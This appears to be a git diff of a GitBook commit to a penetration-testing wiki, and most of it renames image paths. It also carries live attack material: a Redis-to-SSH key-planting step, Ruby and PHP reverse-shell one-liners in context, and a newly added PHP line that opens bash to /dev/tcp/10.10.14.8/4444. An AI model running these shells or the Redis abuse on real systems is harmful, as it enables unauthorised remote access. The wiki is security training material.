GitBook: [master] 5 pages and 12 assets modified
Before Width: | Height: | Size: 142 KiB After Width: | Height: | Size: 142 KiB |
Before Width: | Height: | Size: 142 KiB After Width: | Height: | Size: 142 KiB |
Before Width: | Height: | Size: 142 KiB After Width: | Height: | Size: 142 KiB |
Before Width: | Height: | Size: 815 KiB After Width: | Height: | Size: 815 KiB |
Before Width: | Height: | Size: 740 KiB After Width: | Height: | Size: 740 KiB |
Before Width: | Height: | Size: 740 KiB After Width: | Height: | Size: 740 KiB |
|
@ -58,7 +58,7 @@ This tool is also useful to get **other information analysed** from the packets
|
|||
You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **\(It works in Windows\)**.
|
||||
This is another useful tool that **analyse the packets** and sort the information in a useful way to **know what is happening inside**.
|
||||
|
||||
![](../../../.gitbook/assets/image%20%28567%29%20%281%29.png)
|
||||
![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%281%29.png)
|
||||
|
||||
### [BruteShark](https://github.com/odedshimon/BruteShark)
|
||||
|
||||
|
|
|
@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like:
|
|||
* Signed using the **device identity certificate \(from APNS\)**
|
||||
* **Certificate chain** includes expired **Apple iPhone Device CA**
|
||||
|
||||
![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29.png)
|
||||
![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29.png)
|
||||
|
||||
### Step 6: Profile Installation
|
||||
|
||||
|
|
|
@ -129,8 +129,7 @@ OK
|
|||
|
||||
### SSH
|
||||
|
||||
Please be aware **`config get dir`** result can be changed after other manually exploit commands. Suggest to run it first right after login into Redis.
|
||||
In the output of **`config get dir`** you could find the **home** of the **redis user** \(usually _/var/lib/redis_ or _/home/redis/.ssh_\), and knowing this you know where you can write the `authenticated_users` file to access via ssh **with the user redis**. If you know the home of other valid user where you have writable permissions you can also abuse it:
|
||||
Please be aware **`config get dir`** result can be changed after other manually exploit commands. Suggest to run it first right after login into Redis. In the output of **`config get dir`** you could find the **home** of the **redis user** \(usually _/var/lib/redis_ or _/home/redis/.ssh_\), and knowing this you know where you can write the `authenticated_users` file to access via ssh **with the user redis**. If you know the home of other valid user where you have writable permissions you can also abuse it:
|
||||
|
||||
1. Generate a ssh public-private key pair on your pc: **`ssh-keygen -t rsa`**
|
||||
2. Write the public key to a file : **`(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt`**
|
||||
|
|
|
@ -320,7 +320,7 @@ C:\xampp\tomcat\conf\server.xml
|
|||
|
||||
If you see an error like the following one:
|
||||
|
||||
![](../../.gitbook/assets/image%20%28446%29%20%281%29%20%282%29%20%282%29%20%283%29%20%283%29.png)
|
||||
![](../../.gitbook/assets/image%20%28446%29%20%281%29%20%282%29%20%282%29%20%283%29%20%283%29%20%282%29.png)
|
||||
|
||||
It means that the server **didn't receive the correct domain name** inside the Host header.
|
||||
In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.
|
||||
|
|
|
@ -103,6 +103,7 @@ ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.
|
|||
|
||||
```bash
|
||||
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
|
||||
```
|
||||
|
||||
## Java
|
||||
|
|